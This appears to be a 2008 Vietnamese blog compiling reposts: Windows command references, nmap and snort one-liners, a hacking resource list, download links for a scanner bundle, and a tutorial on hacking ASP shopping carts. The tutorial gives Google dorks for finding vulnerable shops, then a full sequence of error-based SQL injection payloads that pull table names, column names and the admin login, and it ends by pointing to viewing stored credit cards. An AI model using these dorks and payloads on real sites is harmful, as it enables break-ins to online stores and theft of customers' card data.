Sunday, August 31, 2008
WinHTTrack Website Copier
Đây là phần mềm miễn phí, mã nguồn mở, hỗ trợ 25 ngôn ngữ. Giao diện của nó rất đơn giản, giúp bạn nhanh chóng tải về cùng lúc nhiều website để đọc ở chế độ offline.
Bạn vào chương trình, chọn New Project, điền vào các website mà mình muốn tải về hoặc lấy danh mục website từ một file text. Khi xong, chương trình còn tạo một file Index bao gồm tất cả các đường kết nối (link) đến các website trong dự án (Project) của bạn,
Nếu có dạng file mới mà chương trình chưa nhận dạng được, bạn vẫn có thể tự thiết lập để chương trình hiểu file đó là dạng nào. Ngoài ra, nếu chuyên nghiệp, bạn có thể chỉnh thêm luật tải về, các giới hạn thiết lập đối với file, cấp độ tải về (chương trình sẽ tải về cả nội dung những đường link trong website đó, dựa theo mức mà bạn chọn). Nếu một lần lên Internet mà tải chưa hết thì lần sau lên bạn chỉ cần chọn Continue là xong; còn nếu muốn xem website đó nay thay đổi thế nào thì chọn Update để tải mới cập nhật.
http://www.httrack.com/httrack-3.40-2.exe
url:http://conghung.com/forum/lofiversion/index.php?t11407.html
Đây là phần mềm miễn phí, mã nguồn mở, hỗ trợ 25 ngôn ngữ. Giao diện của nó rất đơn giản, giúp bạn nhanh chóng tải về cùng lúc nhiều website để đọc ở chế độ offline.
Bạn vào chương trình, chọn New Project, điền vào các website mà mình muốn tải về hoặc lấy danh mục website từ một file text. Khi xong, chương trình còn tạo một file Index bao gồm tất cả các đường kết nối (link) đến các website trong dự án (Project) của bạn,
Nếu có dạng file mới mà chương trình chưa nhận dạng được, bạn vẫn có thể tự thiết lập để chương trình hiểu file đó là dạng nào. Ngoài ra, nếu chuyên nghiệp, bạn có thể chỉnh thêm luật tải về, các giới hạn thiết lập đối với file, cấp độ tải về (chương trình sẽ tải về cả nội dung những đường link trong website đó, dựa theo mức mà bạn chọn). Nếu một lần lên Internet mà tải chưa hết thì lần sau lên bạn chỉ cần chọn Continue là xong; còn nếu muốn xem website đó nay thay đổi thế nào thì chọn Update để tải mới cập nhật.
http://www.httrack.com/httrack-3.40-2.exe
url:http://conghung.com/forum/lofiversion/index.php?t11407.html
Get Yahoo! Avatar - Web Tools
http://www.mediafire.com/?pnhydgmdjj9
et Yahoo! Avatar - Web Tools
| Get Yahoo! Avatar |  |
Wednesday, August 27, 2008
An A-Z Index of the Windows XP command line
An A-Z Index of the Windows XP command line
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the current script/routine and set an errorlevel.
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
url:http://www.ss64.com/nt/
WMI Command-line Tools
WMI Command-line Tools
WMI has several command line tools used by administrators and WMI provider writers.
| Section | Description |
|---|---|
| mofcomp | Compiles Managed Object Format (MOF) code into binary form stored in the WMI repository. Use when creating or modifying the MOF file for a WMI provider. |
| winmgmt | Runs the WMI service. Beginning with Windows Vista, several new switches have been added. |
| wmic | Performs WMI operations at command prompt. |
| smi2smir | Accepts one SNMP information module as input, and accepts any additional modules necessary to resolve external references. |
| wmiadap | Runs the ADAP command-line tool to parse and transfer performance libraries to the WMI repository. Windows Server 2003, Windows XP, and Windows 2000: Parses and transfers performance libraries to the WMI repository and WMI classes derived from Win32_Perf are transferred to the performance libraries. |
Windows XP WMIC.exe
WMIC.exe
Windows Management Instrumentation Command.
Read a huge range of information about local or remote computers. Also provides a way to make configuration changes to multiple remote machines.
Syntax
Retrieve information about:
WMIC [global_switches] [/locale:ms_409] <alias> [options] [format]
Interactive mode:
WMIC
Aliases:
ALIAS - Access local system aliases [CALL]
BASEBOARD - Base board management (motherboard or system board)
BIOS - BIOS management (Basic input/output services)
BOOTCONFIG - Boot configuration
CDROM - CD-ROM
COMPUTERSYSTEM - Computer system [CALL/SET]
CPU - CPU
CSPRODUCT - Computer system product information from SMBIOS.
DATAFILE - DataFiles [CALL]
DCOMAPP - DCOM Applications.
DESKTOP - User's Desktop
DESKTOPMONITOR - Desktop Monitor
DEVICEMEMORYADDRESS - Device memory addresses
DISKDRIVE - Physical disk drive
DISKQUOTA - Disk space usage for NTFS volumes.[SET]
DMACHANNEL - Direct memory access (DMA) channel
ENVIRONMENT - System environment settings [SET]
FSDIR - Filesystem directory entry [CALL]
GROUP - Group account [CALL]
IDECONTROLLER - IDE Controller
IRQ - Interrupt request line
JOB - Jobs scheduled using the schedule service.[CALL]
LOADORDER - System services that define execution dependencies.
LOGICALDISK - Local storage devices [CALL/SET]
LOGON - LOGON Sessions.
MEMCACHE - Cache memory
MEMLOGICAL - System memory, layout and availability
MEMPHYSICAL - Physical memory management
NETCLIENT - Network Client management.
NETLOGIN - Network login information for a particular user.
NETPROTOCOL - Protocols (and their network characteristics).
NETUSE - Active network connection.
NIC - Network Interface Controller (NIC)
NICCONFIG - Network adapter. [CALL]
NTDOMAIN - NT Domain. [SET]
NTEVENT - NT Event Log.
NTEVENTLOG - NT eventlog file [CALL/SET]
ONBOARDDEVICE - Common adapter devices built into the motherboard.
OS - Operating System/s [CALL/SET]
PAGEFILE - Virtual memory file swapping
PAGEFILESET - Page file settings [SET]
PARTITION - Partitioned areas of a physical disk.
PORT - I/O ports
PORTCONNECTOR - Physical connection ports
PRINTER - Printer device [CALL/SET]
PRINTERCONFIG - Printer device configuration
PRINTJOB - Print job [CALL]
PROCESS - Processes [CALL]*
PRODUCT - Windows Installer [CALL]
QFE - Quick Fix Engineering (patches)
QUOTASETTING - Setting information for disk quotas on a volume. [SET]
REGISTRY - Computer system registry [SET]
SCSICONTROLLER - SCSI Controller [CALL]
SERVER - Server information
SERVICE - Service application [CALL]
SHARE - Shared resourcees [CALL]
SOFTWAREELEMENT - Elements of a software product*
SOFTWAREFEATURE - Subsets of SoftwareElement. [CALL]*
SOUNDDEV - Sound Devices
STARTUP - Commands that run automatically when users logon
SYSACCOUNT - System account
SYSDRIVER - System driver for a base service. [CALL]
SYSTEMENCLOSURE - Physical system enclosure
SYSTEMSLOT - Physical connection points including ports,
slots and peripherals, and proprietary connections points.
TAPEDRIVE - Tape drives
TEMPERATURE - Temperature sensor (electronic thermometer).
TIMEZONE - Time zone data
UPS - Uninterruptible power supply (UPS)
USERACCOUNT - User accounts [CALL/SET]
VOLTAGE - Voltage sensor (electronic voltmeter) data
VOLUME - Local storage volume [CALL/SET]
VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume. [SET]
WMISET - WMI service operational parameters [SET]
New aliases in Windows 2003:
MEMORYCHIP - Memory chip information.
RDACCOUNT - Remote Desktop connection permission [CALL]
RDNIC - Remote Desktop connection on a specific network adapter [CALL/SET]
RDPERMISSIONS - Permissions to a specific Remote Desktop connection [CALL]
RDTOGGLE - Turn Remote Desktop listener on or off remotely[CALL]
RECOVEROS - Blue Screen Information [SET]
SHADOWCOPY - Shadow copy management [CALL]
SHADOWSTORAGE - Shadow copy storage areas [CALL/SET]
VOLUMEUSERQUOTA - Per user storage volume quotas [SET]
By default an alias will return a standard LIST of information, you can also choose to GET one or more specific properties.
Configuration changes can be made, where indicated above with: [CALL or SET ]
The CREATE and DELETE options allow you to change the WMI schema itself.
alias
alias LIST [BRIEF | FULL | INSTANCE | STATUS |SYSTEM | WRITEABLE]
[/TRANSLATE:BasicXml|NoComma ]
[/EVERY:no_secs] [/FORMAT:format]
alias GET [property list]
[/VALUE ] [/ALL ] [/TRANSLATE:BasicXml|NoComma ]
[/EVERY:no_secs] [/FORMAT:format]
alias CALL method_name [parameters]
alias SET [assignments]
alias CREATE
alias DELETE
alias ASSOC [/RESULTCLASS:classname] [/RESULTROLE:rolename][/ASSOCCLASS:assocclass]
For more help
WMIC /locale:ms_409 /alias /?
WMIC /locale:ms_409 /alias option /?
e.g.
WMIC /locale:ms_409 /BIOS /CALL /?
WMIC /locale:ms_409 /MEMLOGICAL /SET /?
The order of the /FORMAT and /TRANSLATE switches is significant: if /TRANSLATE follows /FORMAT, the output is formatted first and then translated.
All the options above can be extended with a WHERE clause, best shown by the examples below:
Format:
Format defines the layout of the information:
csv.xsl, hform.xsl, htable-sortby.xsl, htable.xsl
texttable.xsl, textvaluelist.xsl, xml.xsl
All output files are unicode text (convert to ASCII with TYPE)
Tab Separated Values (.tsv) can be opened in excel
Examples
WMIC /locale:ms_409 OS
WMIC OS LIST BRIEF
WMIC OS GET csname, locale, bootdevice
WMIC /locale:ms_409 NTEVENT where LogFile='system'
WMIC NTEVENT where "LogFile='system' and Type>'0'"
WMIC SERVICE where (state=”running”) GET caption, name, state > services.tsv
WMIC SERVICE where caption='TELNET' CALL STARTSERVICE
WMIC PRINTER LIST STATUS
WMIC PRINTER where PortName="LPT1:" GET PortName, Name, ShareName
WMIC /INTERACTIVE:ON PRINTER where PortName="LPT1:" DELETE
WMIC PROCESS where name='evil.exe' delete
WMIC /output:"%computername%.txt" MEMORYCHIP where "memorytype=17" get Capacity
Interactive mode:
C:>START "Windows Management" WMIC
wmic:root\cli>/locale:ms_409
wmic:root\cli>OS get csname
wmic:root\cli>quit
Notes
WMIC is available on Windows XP Professional and Windows 2003. To retrieve WMI information from older remote machines download & install: WMI core for Win 9x / WMI core for Win NT 4
The availability of WMI information does vary across different versions of Windows
e.g. ODBC, SNMP, Windows Installer.
To run WMIC requires administrator rights.
In Windows 2000, around 4,000 properties can be monitored, and around 40 can be configured.
In Windows XP around 6,000 properties can be monitored, and around 140 can be configured.
Windows 2003 offers a few improvements and bug fixes: the global option /locale:ms_409 is not required (it defaults to English US.)
When you type WMIC for the first time in Windows 2003 all the aliases are compiled. The second, and subsequent times you run WMIC, it will start immediately. Under XP WMIC is slower to initialise, therefore to run several WMI queries it can be quicker to use interactive mode.
* WMI information for installed software packages (PACKAGE and SOFTWAREFEATURE) is often incomplete and inconsistent for a variety of historical reasons. A more reliable method is to retrieve a list of installed programs directly from the Add/Remove list in the registry, with a WSH script like this from Torgeir Bakken."Life is like a game of cards. The hand you are dealt is determinism; the way you play it is free will" - Jawaharial Nehru
url: http://www.ss64.com/nt/wmic.html
Quick Command Lines
Quick Command Lines
13 05 2008Port Scanning Description
wpsweep 192.168.100.1 192.168.100.254
2000
Ping sweep 192.168.100.1-254 with a
2 second timeout.
nmap -sP -PE 192.168.100.1-254 Ping sweep.
sl -n 192.168.100.1-254 Ping sweep.
nmap -sT -p 23,25,80,139,445,1433
192.168.100.1-254
Simple Windows port TCP port scan.
sl -t 23,25,80,139,445,1433
192.168.100.1-254
Simple Windows port TCP port scan.
nmap -sU -p 53,137,161,500,1434
192.168.100.1-254
Simple Windows UDP port scan.
sl -u 53,137,161,500,1434
192.168.100.1-254
Simple Windows UDP port scan.
sl -t 139,445,1433 192.168.100.1-254 | sl \
-b -t 1-65535 -u 1-65535 -f “stdin”
Find all hosts running NetBT Session,
Direct SMB or Microsoft SQL; then run
full TCP and UDP port scan with banner
grabbing.
Packet Capture
snort -W List available interfaces for capture.
snort -v -X Capture all packets and include hex-dump
of packet contents.
snort -v ip proto 50 || ip proto 51 Capture all IPSec traffic.
snort -v host 10.0.0.1 && tcp && port 80 Capture all HTTP traffic to and from
10.0.0.1.
snort -v -X src tcp && port 445 Capture and dump contents of all direct
SMB responses (source port of TCP/445).
snort -v -X tcp && ((src port 80 || src port
443) || (dst port 23 || dst port 25))
Capture and dump contents of all HTTP
or HTTPS responses, or telnet or SMTP
requests.
Categories : cracking, hacking
url:http://hackersworld.blog.co.in/
Ed Skoudis' Top 10 Hacking Resources
| Ed Skoudis' Top 10 Hacking Resources |  |  |
Discuss in Forums 
CSP Online Mag recently interviewed one of the most respected hacking experts in the industry, Ed Skoudis. Many of you may know him as the author of Counter Hack, as a top instructor for the SANS Institute or for his hacking demos for the US Senate. Either way, his reputation is well deserved. Here his top 10 hacking resources.
In no particluar order, here they are:1) isc.sans.org, the Internet Storm Center. I read the Handler's diary every single day for the latest activities of the bad guys and how to thwart them.
2) www.securityfocus.com What a great collection of useful tips and fascinating articles about our industry!
3) www.packetstormsecurity.org This huge archive of attack and defense tools is invaluable.
4) www.metasploit.com This tool has revolutionized the development and use of exploit tools. Very amazing stuff.
5) www.insecure.org The nmap port scanner is fantastic, a must for every would-be attacker.
6) www.snort.org Snort is a great IDS.. learn it, live it, love it!
7) www.bleedingsnort.com These folks have really pushed the envelope of snort development. Nifty ideas there, to be sure!
8) www.counterhack.net My own website, with some useful and entertaining information (I hope!)
9) Information Security Magazine This mag is the best one in our business, with a huge amount of useful info in every issue.
10) www.sans.org The SANS reading room is chock full of useful tidbits, and I learn a lot every time I go there.
Thanks!
--Ed.
url:http://www.ethicalhacker.net/content/view/11/2/
AIO Network Sniffers 2007
Bộ phần mềm cần thiết cho Network Admin dùng để kiểm tra hệ thống của mình, bằng cách quét một loạt các dịch vụ, IP, lỗi ứng dụng....Ngoài ra đây cũng là một bộ công cụ rất cần thiết cho ai hứng thú thâm nhập
- Retina Security Scanner
- Capturix networks
- GFI Languard Network Security Scanner
- HTTP Analyzer Full Edition
- NsAuditor Network Security Auditor
- To Ping-test
- Safety-Labs Shadow Security Scanner
- Security Explorer
- Wire Shark (Formally Ethereal)
- Retina Wi- fi Security Scanner
http://rapidshare.com/files/73932076/AIO_Network_Sniffers_2007.part1.rar
http://rapidshare.com/files/73932103/AIO_Network_Sniffers_2007.part2.rar
http://rapidshare.com/files/73932087/AIO_Network_Sniffers_2007.part3.rar
http://rapidshare.com/files/73932071/AIO_Network_Sniffers_2007.part4.rar
http://rapidshare.com/files/73932050/AIO_Network_Sniffers_2007.part5.rar
http://rapidshare.com/files/73932048/AIO_Network_Sniffers_2007.part6.rar
Bộ phần mềm gồm 6 phần, download về và dùng các công cụ giải nén để sử dụng.
url: http://vndev.net/forum/index.vndev/topic,52.0.html
- Retina Security Scanner
- Capturix networks
- GFI Languard Network Security Scanner
- HTTP Analyzer Full Edition
- NsAuditor Network Security Auditor
- To Ping-test
- Safety-Labs Shadow Security Scanner
- Security Explorer
- Wire Shark (Formally Ethereal)
- Retina Wi- fi Security Scanner
http://rapidshare.com/files/73932076/AIO_Network_Sniffers_2007.part1.rar
http://rapidshare.com/files/73932103/AIO_Network_Sniffers_2007.part2.rar
http://rapidshare.com/files/73932087/AIO_Network_Sniffers_2007.part3.rar
http://rapidshare.com/files/73932071/AIO_Network_Sniffers_2007.part4.rar
http://rapidshare.com/files/73932050/AIO_Network_Sniffers_2007.part5.rar
http://rapidshare.com/files/73932048/AIO_Network_Sniffers_2007.part6.rar
Bộ phần mềm gồm 6 phần, download về và dùng các công cụ giải nén để sử dụng.
url: http://vndev.net/forum/index.vndev/topic,52.0.html
Tuesday, August 26, 2008
Cơ bản về hack asp cho mem
Cơ bản về hack asp cho mem
************************************************** ******
************************************************** ******
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở Google. Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id="hoă ̣c search theo domain allinurl:”.com/shopdisplayproducts.asp?id= "bạn có thể thay .com bằng .net,.biz ,.us.....etc thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9"
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta thêm dấu nháy đơn '
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem
Nếu shop có lỗi thì sẽ xuất hiện thông báo
Lúc này bạn thấy Unclosed quotation mark before the character string '
đối với lỗi này ta sẽ dùng
Còn nếu nó báo thế này
Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
bạn xoá dấu ' rồi thêm dòng query này vào phía sau
ta được như thế này
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
kết quả 'ver_Faq' là tên của table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :
ta được thế này
Lúc này sẽ được
Ta cứ lấy tiếp như vậy :
Bước II :
Lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers..........Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:
ta được thế này
lúc này ta được
Lấy column tiếp theo:
Khi thêm code xong sẽ như thế này:
Ta được
Lấy column tiếp theo :
Lúc này xuất hiện
Giờ ta lấy username và password
Câu truy vấn :
Lấy username
----------> username là admin
Lấy password
----------> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column 'fldpassword' mà không biết nó ở đâu .Ta thử search tại Table đầu tiên 'ver_Faq'
Câu truy vấn như sau:
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ "pass"
Bước III
Sau khi đã có username và password việc còn lại là tìm link admin
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi
url:http://danviet.biz/forum/showthread.php?t=776
************************************************** ******
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở Google. Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id="hoă ̣c search theo domain allinurl:”.com/shopdisplayproducts.asp?id= "bạn có thể thay .com bằng .net,.biz ,.us.....etc thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9"
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta thêm dấu nháy đơn '
Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?id=153'
Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
đối với lỗi này ta sẽ dùng
Code:
%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
Code:
Microsoft JET Database Engine error '80040e14' Syntax error in query _expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467
Bây giờ ta tiếp tục :
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
bạn xoá dấu ' rồi thêm dòng query này vào phía sau
ta được như thế này
Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153 and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
Code:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Code:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password Code:
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153 and 1=convert(int,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons')))--sp_password Bước II :
Lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers..........Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:
Code:
and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser')))--sp_password Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser')))--sp_password Code:
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Code:
and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153 and 1=convert(int,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto'))) --sp_password Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Code:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password Code:
http://www.victim.com/shopping/shopdisplayproducts.asp?cat=153 and 1=convert(int,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto','f ldusername')))--sp_password Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Câu truy vấn :
Lấy username
Code:
and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Lấy password
Code:
and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Hoặc có thể lấy cả 2 cùng 1 lúc
Code:
and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Giả sử ta cần tìm column 'fldpassword' mà không biết nó ở đâu .Ta thử search tại Table đầu tiên 'ver_Faq'
Câu truy vấn như sau:
Code:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25pass%25')))--sp_password Code:
